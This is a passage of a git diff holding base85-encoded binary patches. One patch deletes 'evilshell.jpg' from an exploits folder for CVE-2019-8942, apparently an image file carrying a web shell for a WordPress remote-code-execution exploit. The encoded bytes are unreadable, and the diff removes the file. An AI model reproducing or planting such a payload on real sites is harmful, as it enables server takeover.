z`Xz5}J~-tZ!i6sfcMc3t4(tg8CqCP1Dk2jF?b2YMe%FCwU+zz}8!KcZdo{{7yo>7!
zNocn>zBBGk@I>6vn9c!nBhHf@sDy4Dj~NE_%ywhbW;Q95PkZ)ei_p#7pGAd7(^J%!
zQ11vzaFCqufPoT5cyrSaCa<Rp-Q*jqR@O{KvR}Dj^f@m|*5eQoq@ZW{)lTxGs~kTA
zzu*8Rzm1194^BsolrW~?xcud9FUn`I2)Z8Qhx<>x^tQdB`V~3%ATX7{ZD4js8w$nP
zf}q&lIfd$p%91p2m1p(gS5kXCq4bB;b$bbgE*Lv<UVPj#Q8d5jwf3uSTcc`+>zNow
zP>W>kA<rlPc^utLQMx}>J#DHF^m7Tg8V>C^J`n<(2C))Y(#M4wXy;3d$|z~84|Ma1
zr<%R|uX(1Y3KLib-LFKGV$JUqK9vd^Mp9Q=VPww@GHr1&^y?Xn3UG~Ld#u}_&9Jqh
z+UHX`?UhB?p;u-J?Q;Qt=N^tx8>I_!J7tJ2=@5Mc)YW$N7gKVK)ue>@+5PQ6wyVn-
zxBYBUxrq3w%KBnPHmLhYq~PirQgf`Sm4&~eM5|w!Rig7(j!e|6M1M`vH2AfbmGm_3
zkCJyvIJ6Gyiv#3T*F*g%IAUV=nOd%DFS7g5u+z4mXVe4FoPi%`UgkQ_?kk2LTQ~}w
z`+|iUobw`$u%g3lztvt;M<@?}`NEzcW}n^5t^e#)@*0>?kZldQzre=i#=sf4C@Fs|
z4^zVb^q|?8kedACi``4TGPk?7APXv4*+CGpy>eOU*3XI&A@s{mCNGuwmO>C&7j1IP
zEShPZ+uR(FIT?FO+}HOaM3|*BY7{4fkv-JGoSckOMfafd)pUfU<5RE5<=C~{#Js#S
z%r(1lUe@idN~7epBxVrv1hCz;AZ!r)5o1JqQ!q(fNWw3VYxo+l%BMNU!@i_GDJzV>
z3L$YH@a*j}YC{)@GZb@crT0}pB)L%r#{cW9PD>YcKPTgNe@y%@2`|H0AHPiyV1JJL
zRKxrRlK3E^objMIkGvYQ_1!Az<B31A6B_MM>GzV$J~t||<35Wh#s{n0v+f|6T=9om
z)`xKB@E&nB`N2vZ4cjG}>Gs3UdB6%4Set6)%kjic*Pru*X3KA-!*?wNCXd{qp&Ot}
z+RCL0nYN{^%NTsNnzK1|+b{7-{S&>}bBzWw@o6fzcu%}WZsU%F6G9s+wI09dDY};R
zi>MxdTm5aRdmopxSGrZR*Chpr3<OjN$%C>aTVmqk7U9r}j-tW3Uk45+@Lk5rS$xVG
z<l*6DI?J-kA344f`I%3yubpq4WmyZ<u0>>SIMJv~@Vu(UK5moun6nU#--~;XTr1wI
z$07PvGz(7ATPivr%WtoFj-GCK_Y;1O3L2>rLkIOEubWKX^QmrWxZk8w?*F9lZLfom
zx84Tw?_K;1=p)$PydFr4BT?wWG}D5TZqN*<W;Z`;J|MGi&L%IYC??;T8}qqc=8~$b
zQ8ct4PmCZbBq4lp>2Kr!YdqKcRGZI#YRiAgDQj%_3|`V(WXt{Q7I3+*`n1iMXEA6t
zFwZ2eE%eAh5j7kcyALElZS=c{OdhM?^9xw7!Hd;fha)WVWpOw~lA^QN<VUdZSQ2jC
zKfFR$@jQ-}vrcB7L@O&Pj9oT69C94nw(>DwYLKM#=>^%N1e>9qI1Yf&?a7aEF9yas
z4(fU`K~OOH;jQpvlB5^>mx%4LdL52z$IMT}f^kOI#+`-;pJ1CfvIcRTO!R1&+QCcT
z8C6E78l?{lG)2CLbbX2$k&}O_a7(m3{J=6AAx9v+MNqF;+g=*SGj*fBMu|tXif$4Y
zZ%`9({I|!73~KkTX{fPEZN->+D=Zy7R}UKwJOb?ZV0l{{N`M9M@J_DdV|D+&^amBV
z;d^#ayoa-ooExJ&5b_^>aE6H!*eKS4@o_37r%l=LhZM#!-Dpf;*rwJ&Ti!i9DpKx@
zZ$$Z(vcA>T)5dpZYnG>}><~=n;lK6SKcJ$b@&S}+)h@IqXe5^2VnVJ<zx_PAK&w7r
z;AQgcS6W};D^;W7$Z`@EP_*6fU)&weqHTB93qo{zKZ-xdE{YCr`X%Ss^XP-zJV73Q
z7Ta+KizGbGw!M!eu`H&aR%;HVD=D@5&e|N`C{i0XJ>O+w8b!lDr<;*Ih0*%gb4+OA
z3A@(NtB)yG)|SIo{!b2sgT$ijSr{@6oBoF?@A43}_%B~s-WYh5<ox9-ABd8}c3ef=
zLL>&cb21eODfrFklbxN<1m|j}5gqz$^@y~01QwMts_mD|6olXk8ZM2|rJ1G3r!u^M
z5>2{SI@adxbT}FdpkPbxj|EgldSEGzc~QcEQgK6PI(Ou#MQL&G>xx;^aE-w;EU4;Y
z+pUf)mnfIuNivQfjqLV-)6_~5TGR^fUf63cA6cGpAzuD7JKGmxBkc2ulpV=(x@`iG
z0~^9<Mp2aP4Wme!<?0mxRVc_4`O%m#?qk;+V}<s-xe7_Xot}4CB8DFyna1zw0V0Pg
z{(;a=1fN#^k8x9;?PF{A8YEs5MR~6d2&)D!U*8WdQ<^G@?F@yW!|6hx6^UHT{Ce;J
zCIVM>n_j~T*Ku-prF?NVIM4Hek5^SMBEinlA`v1a<>wXta_e94k^oWxq%v&X9HBQb
zB^V4>I{h)vgM-S~SvbP_DfRj|)y^eR-~FWIyY%Qa-`l<}qHW+lihadgNTn8<w}Hi<
z5BU~@D!a6dBvzKw4^GwK&zg2_&GwaS^WQT1>@_Wpm4}OgdKYXD6!sI#OJ^@`dy7XW
zY@*a;uLg1T`%6WK^(2YUeTsMRHQ<IEtTVX~hgvu2Ucg^yxBH`x%y_tXzfAGU1?jvC
zxYOTH>BoG%$Geo?{_t8kuer+Js{5o?Chwj6#AJg@r5z=|9$8m3OitdfpV}m)^YqKf
z43rh+{8Skx_y$hzf5FzkI_8APh<NVV$aw3XlG49C!uh%DF{?N9#McZR*gn~tj|CI?
zF#qDxQH*j~s$UH1U+MeNyPqdpTqNdzbW&E_^sl$oPXsS$ZMCGW4yMPcPd^3Y9XUWB
z?#ru;g0}PMUJ8RAV%#P>?rNnc&n+`Q1W6&Dp6T#O&>PPhkBykjAN}v)ha!h~a8>+Z
z)V*aCM@d5y=k>?0GeynfHXSr1EJ6;3^2vfbto=cjMXgaG`1YsDOkpPz>L1GSv^HU2
z#tcXXp*0V%jlT5uMryfaAM|T_EcX+%&u!JTH14Jvl_Okitow(1(~L~|xkGol23+PD
zGV)wEQQ^gXa;3M!shcmN=Xi^b%o{h`>#!(0+&HRI%Y@J`0}+e1@o=plZ8G%B)ZK|>
zinQSUz=+#HN0;s$;k;?tr1@lE&9b_>I-65re`ZgGQA>v&x}!w`P9RZoy%&sC7=!|@
z^J!GVooJy(lD8@J6c=~zRt>D)bHj+bxYt7MGP75D3rt!(?kz-Th#8qDXD|4@M*q2~
zYQb%DEmc#Xu`?Qze8>t`qU-mHtH<EH%<(qa-vM6Jensf-ziqSa$#xen8|^y>!N1R*
zS+V2vhwYw{mN&`P<*m@H;J+mE4pg>fEY$o1=|)WV_UghRKsmYb!OYZ)^vdtIH+ID?
zQIHR-*pe>Eq!n$3I<lKJMD^pScF=S}4YwQG5#&C}I#hY%n1VGY-fEYRXPL?O6YiKA
z!d;-S`7bJG??M>6@7mA|95yg;x^OSu$_>T|Y)QkqoK)pxq$dYl?(!~G@rbG3diA9E
z6Hg-~y~9>y=OV-?+|R$%&B70h<Qr-!yq9$)X0-S1^$z^`afGkNG~V$uvegNURPl?@
z7j$*Y<Z?D&Vz{0}j)CNYP^TwL+fhJ$GmtL*uk}G>K&pc1mw0c}$FtB(OndI%CFKxl
zbhYaHy#VctjtBF@!xK9B5vj?JdhblcK@$!;B*cQ`)P=3hq>H>HaePtyxC4t1$xMEu
zn0fZY*!$@sH-c2_3g=U=YBrWml(IWii)9z|>jx%#umWaeKBHcOAm;ilGK1qvT7U4v
zFhH7%Gez^e`P7%5nAaIcV$DT>(8CAVj!X30hmLC@U~0&y2l_s_`03&1PEU}!w$AmZ
z`5PbP(vEyO;s8A##*&yC^$l0M-{VOP@0J6@O+^i^pQ5<cyw<m@KPs(n?RZ{=P5eX<
zM7_J{W_jbx5iq?+lMxG7h?;O+a&5`Ffku*-ixLlwy6$)W1A(#I@QS8jCoRoSG|XnQ
zeVVJ2V$ESZLHOXMnG*|w6lzIg;j_+8B2u1ta?;hHyJRLih{N~AUR4IXDAq>AJ#pta
zb&%W;*LDmIH35($KADT>E`3AA*A+K~_E??!#8e0a_17Rt@=)7|wB12S#Idxnme6%U
zy*f}^DbX%^0`q-#z!0kSJv7_2eNd*IB_0BO4A#^lus^x>7`Pw!fjNSO>}~_)%Y6P6
z#Ib3RLqB1E9*PPe(H=a~ies3|EB$%+n6-yMs({sZVULA2f<*_B;F_bGs3lo7uSAFq
z%&}`tudXl9;1lN8oK|>H5M=OV<ZtW$jumyfPqkW9NRNWhZN9as07q!DKWg<e&zLEy
z@r@g!o^d&~gvj33JCU|*S;ead`h5?)8MromKxpp?;8ujO2e45&E_b<>=ZNRx;IG39
z9@dXR$yq%7Q@4FW2byyJf-ns`IKIYWtSg2-Fu#Lvl>wsd@BSRnX;hQ>GH(A3Q>@o%
z?e?{O!o;oc=WbwQGBvo@N=w{Gr>SAgO1O44xYw3X&}5SEG2xsFf@W{nMz_4vdqM`x
zd6E0;WWR3PBbYl>ofov@WI~eKZaUN<$>5xE)SVfiFzZoK3fkx1u{*4P@qjzcsuy?E
zAox8PdxWA$rc1hiFIr&la+ZBc9c_Z;jwbR}aGoUG$9j(diW;3D!DCiKoyTjJB*0Ib
z2pn%>%ckg4Qe56w`<~C@j$P5bl0}Z0Et3!AV6<XM&*~SB1q8y+fJf);;>6@rzAv4r
z)w!`Vb_zM#AM~8xkIbi$<%dbvVg#AyvqT`T11<+9z%E?>7RuoNb1%y>+jZV~wu`~3
zhh8%C^ezfJ8IAaGSA~Y(^8{~P2i+KmMER4UL^+d2+C*|dIq#$8mnV^DPJUqh%4;0%
zE_^#JaPXYLV+z40iktZZoNQM&xllsj#E2_g%loZz&R=tI4`q3=K=ky4dv&gRd!U12
z#MuI<+xsT@q+3}cxe44=eOhaZN77tHli5<WE@-EPDD~ZLFf?0C`Hw|{8Ko^Ux#bSk
zFsvyN7d?BaXq-o)vX(7xwdZUiU)?hck;iAM-;~RzOmT3}DYE{0M4x7~AV?qbHDX9D
zfW@Kax?_HC(z0oyJ<Xw6wf>O@`uC<=Zhq9trRR$zzAa}n+Q_C8xK1=cvesf|9&KeF
zOhT~EDW$keS~dE;+0${aXmE0N%(b~8_QOt7?5NWTZOl3~kF?!|%ZNHxPv!VR;F?Ds
z{1|w_dsUH(%`p1=pzIeDG1Y?RCz=E2vRNQqV-FTYz$_$t3EvmU4@ht;Z(lYM<oMj&
z)|d;{k8t0BmTVj3z7vyc`;hO~LUmrOXBSf=mbgvvOh)B~x;<7o`KwA$%EfpwmX%#o
zle$&NR;KjfABZ;$P*{j2_%Kd`uw}I?kVkP?ZX2BQ8$8Ve>0FH+az65*|GE;(l6ap9
z+<D(K11B9N$sES<heDIV<Q;8%)h|cq6tP<@Tlg(8A?dmnpG-|BVvr_;<#ozCeMOG*
zhYrj!4{k;-T*#9S3U?1~ulr6Ke-|{YUJHLLm=#A?JlnXyarcO!FR_xojWGifDGRA^
z{RyT#dfPG2ZnEW4*koP<zpW~ovk<r@tgOs0;$VN1#UmcP?)btnP~eqZ1I`3#s<rDk
zCk{jtd5br9%I!h~ELbt=(LPV3-J94=jBUmL!#nq{f9}70_%q3qU4fGHQ?xfPXdL9p
zq^%u|V|V^MoXD&13b_8QT#4OXOt2!2yBZW6$~$erHb7e~yEqVhc#TLzt8^!fe8CC{
z@(vao#G|xLul;GwX_UuN&Yaa$9Og|)+Xc?qCiqvbSfxJnQ1ZU{^Jlk<vs5hS&r2Y;
z)=Qb}z$bW0V_>>5prRSx+jT)}_>}WU;l$XhoPyoTPiW?>XXexR#S?<e5jnWpNxHx`
zB{6!biKe@;U53c075SQI)`BKYs69PmGxobX1ma1aTB>qLZ`4|twqkN`)1c%E(KkGd
zcd8nga57++q87s8xmj+{6D_ZPc`mJVd0PJOi+nROa@Uizy~#>NF773TZa?-sR*Mrb
zlHm9p%N6EMj5U`DZH`fOQ4Vf34bI9Mf?&1bveeZij9jHV5ZL{Qzwq7K1a#Tm`K~A)
zbw2>$K=zO{UmXiFT=yVQ@q06jvNm2fvl2AVqG!^HvA4-LQ*FnkwN=b-U4N2g6jCj3
zg!}6&Jh{U~(<haDu}zn_`5mrIzwpiATA);*lv?Sue2&}E!yfVAmCH69U(-r5>S$mF
zKOkqeF-iHLj*pT-=X6JLG(KfvuMJlzoia4LzC3KOH`21h^1BxVz)5wm+NkF@6T1;m
zI!k4TM0^&dzPa}E)BRJAH=-GGti)CsD4_1X*26xs(a)ASm(z2Kh0d473>`){GdbgF
zrhS>fCAc2o<SY#ikvlW#AiQt#GG$2~tY@msALc=AI>3#^AEC&9AnQJgtfRYufI1@S
zecgj^1V8Bu!%LajRs^Be0oJWllsIDl8~!8>)Yhr&eWq!@oCY3gu%nHi4Y>P1(zgvN
zya**0=bzi1Qt^cXCmS}cWM#rLn8%G9SDB~t<6wO*Sl1maC)f!>wWkXcurg8K!bCH~
z#4Bsl*|%6Vf@-X^(D0RWJ7AVaW(pS8rj0>0>taRP6oAyO_A3E$^{uV<{aLeOy&Kp}
zj>BdhN<lxg007=hPZ@E*ip1yHHAyPX+X!N=OzDKxj@6%xx8a<VQydWo<1XVDs1^&;
ztmL7AyAp&%ZM@XH$w@0AAm`d2+4Q{9-zS{kg<hO+2=;UZ0y||Sr~#=cGJz8vapl|2
zOKlaD*L$KF3dN})FCQFTrfER}<+RX^e|!CK>S}^-HLYaxV)+b^dNuRjDBA5xR`+A;
zSi?qK;;UFE#h7CvCu+-rJ&PQ}9>L-t=-pFQyQdWiGp}=gn;>izfz(G&vN)KEYB}71
zoPkJ3<JlR7gh1Qrk-a+!Yn|P1&SbjM48%>S6AAsHQLtsoO|er1e#!lcqK}q|aw31(
z4?*Qf$7Lo6H}WA81GbKT@n8?LYm@lC>T8u=;bJ`w@CCJR>dD?>7kKQIKw;T!*!(vG
z&8b230N=4a?dj^9J2-v!jZVWoHjj+_h;W76Lt8^l?|vmkdWo;EHwX?c<&6K&DQ62;
zjopl)S?yWSN+;>!LE36Z4vd*I)aCJFRH#_5I2-Hom7`&n1-W{&(&2JwcVQOBseb{f
zI^8c&V%`^yZUoOR?Ns;2ALBd7)=z5^$f`cU?wsFm!upD{s@l&gx8En!acr1S&+S!=
z(HEre1ilCI=V8i&T}_Ttc(OQ~{Nvb~p0nxMthMJh6rJm^@cAP^+#)s}v=h*JJ4b}?
z%D^TcOdAX$*TvI9G|Ju#r|J3Jbcg}HYbgv%#&ayG+5<LTP(#ISTD+~#K_`8Jiu~Lg
zQmdG{{%4k`s39p`sKy!O0%T|lgB$SQz;m{G#``F)8#nHHh<<wsz7`{k5MGK7n|nhO
zu0K9h)t~Fu_?td{?MF8TD}SG8GisS_q^0hV8{=ro@x<)vCHxw!1AdWe+x7YgOaud`
z1!Pe!%8+t14y{@;Rs=iCwk{iby|ModW#e9IQ(+EaS>SqR8gw<!$4n_2-`7u^eDpnU
z{hdprc3T%~PV6~>mKi1L_TD0+vQ6|v+!vS(#!hWQJ3$|1Lk=}RY4Y<^cUX1NEyg#M
zSq!+**;5$!2l@^TKjf&oNj}%&;KlFyGUk`utOc2u+s0|VbOHRHBkk1O(0+U<P7-ZV
z>^VzxS-a-$dO3I!)n%&^r8$|o04^~;S%06%b9*lyq~Ydz5sz8V$ZTnt{`+bTnJZXQ
z9k%W~?6)jN8Me<oj{SR~5heoui#y`ph`_BwxvnU2D&ahcaoNQ2z5o$?{DoFBmXttj
z^lILFTEp5XBjk<U`PiVP0m$|yR&Lwb3Pp_)(;3g@Fgh|~Ru-Jw$ucWf5!-Qwu-7ml
ztUm$t;-6?tr1<q{h#>3317zIcC{yDq)e8c5;=MdO*n{T9s3j>FRHYjb*zrd4N9d-<
z_R0CqD>d0`D>rywe=_CKfhfdyeulGv_0J@#H;ON}Wb#3v5b*u7!xLoF;7MaM1GRVU
zobb%gPCwdMfm@*IDD3%xMrR-kfc-L|S@rPd=*~}+pd%~GE7QV=Tfj?&`DnyR0vN&$
z$n|#PrH7CdD3Qm>ljV+lB1-+c`BrG^)4w))b9|qbZNGNUS(4vLBX<Ky_;yclw5XYU
ze2ePz#goJ3XPDH*t|Xq>`TqVt3a_hwH+&8L{G?#>Y8eE?LIv8C=z4$&`ImtcO}~eT
zNO(}X&l3E>UG=0Rx0}yhn_p7VK}kF^?UO5cn?~SM&r#2NBf!Y5H8mYHo>!l!OuSMx
zhx8@w{uTEKW-Q+U6QK{Wdu5Dj_%UXGn<(gKsDIy-n5<s;wF!}MZ`rfKGuyIUrtOM;
zZo`#DhzdJDNtUk4c#pk{NWs=QWg^I0K-Pz{86rob`RJyV+Os^KW0qZye-G7J^@R*O
zgannAue2%AoRV7tDLe}zKyQ~sLPN!x=EH{YgZRObVEvmAmno1<V0{CD1gWV1r-$eN
zgcJVPzoXRsB)Sn<`tDd)l<;Jo^l`^3tj+|;X*ES4pG%6(X3O%Hu>Iz&SW{%(#KwVx
zn&UPRPp%Ck`laG)u}Q8sP96K$fLxxhusq|S{#MZnwmne&>R@tG<_P%wr|5z|NcKP$
zwXjD<viYG7I4D;mBkiW04u|Bl_~EfS_+D;B*8P7Vrr?(gn4JfG@n$_)x3mg;Rpxl?
zQoVNk4&fk&7wO%Mw4HgmXW07K7P=`!ioZ@oS$hW_E>p3V%#hLo=uf;OqZQ<N(nZgy
zt#0y=m4x}GY8#P-e~l}!+<!)du^r9`Z!C2B;_wR^)R86y&Xwv-o{8I{rU%+x!3xZa
zp0PVuIo5T%@POKC;t7|^C@ALGINpWK7}`$`<=iy3!`2}=UbIH#$ijcnK$$0?xUlI@
zYgE@_xKXaONsNBfl(e8WNna2wwyf4F>!BFmw6U{ru`R|7{dWlKf4<M-K^qJ30*sb$
ztT!;DPWBwECTJV5Azv#WSovkK9-TVmoPWWpIDLIq;!vOLM;Arx<x_)WM=0u9WE{*z
zKK^|^W%BR>W3sxU9*8&GJ#%&+AE#IVo!UN%?Lfgf@9NyeV5ylsO(N?$ypQbbn_h8W
zyploHUCLc=(x8ik@5%i@J&V{*e)J||L({93x(QzE%2{(l7QVw0d@P4dFgl4FJ9_^g
z$e<s15H4BvPJ;bX1@;p>^WNAmFbpCzJ$PJDwu-vDrXRs-5R6|zQhie(j09Q(U38JO
zhYKhngAJ@0vO%(Hy<*PIKR9MYdGuv$M3BAHAVC<sRu!VoHiK=#gVU2AeYCqMP;F;M
zAUt9@D?L+tct;-lP%drty$ZQWk@bF$#|2tLmph7XwFqi)*F8@CC^AXM*CGD~tSS;h
gG5uooqi>D|={rjQM=;vIE`|U9`G3C$9RE!JFGUPef&c&j

diff --git a/data/exploits/CVE-2019-8942/evilshell.jpg b/data/exploits/CVE-2019-8942/evilshell.jpg
deleted file mode 100644
index c14e57c7fd3d07851409debecfe5892157cc3301..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 11820
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
